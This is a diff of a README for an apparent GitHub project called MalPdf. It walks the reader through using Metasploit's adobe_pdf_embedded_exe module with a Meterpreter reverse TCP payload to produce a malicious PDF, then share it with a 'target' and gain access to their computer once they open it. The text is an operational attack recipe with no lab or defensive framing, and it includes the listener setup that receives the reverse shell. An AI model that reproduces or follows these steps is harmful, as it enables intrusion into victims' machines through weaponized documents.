Nicko15/MalPdf/README.md

 All the needed packages and frameworks will be downloaded

-Now to create malicious pdf and use, run the 'create.sh'file by typing:
+Now to create malicious pdf and use, type

 $cd metasploit-framework

 $msfconsole

-$sudo bash create.sh
+sudo bash create.sh
+use exploit/windows/fileformat/adobe_pdf_embedded_exe
+set payload windows/meterpreter/reverse_tcp
+set FILENAME malfile.pdf
+set LPORT 4444
+show options
+show info
+run
+exit
+cd ..

  You will get a file path and you can shere the file to your target

 To listen to the pdf, type:

-$sudo bash listen.sh

-$set LHOST <your_ip>

-$run

 Replace <your_ip> with your ip address
 Now your pc will start listening.
 As soon as your target opens the pdf, you will get access over his pc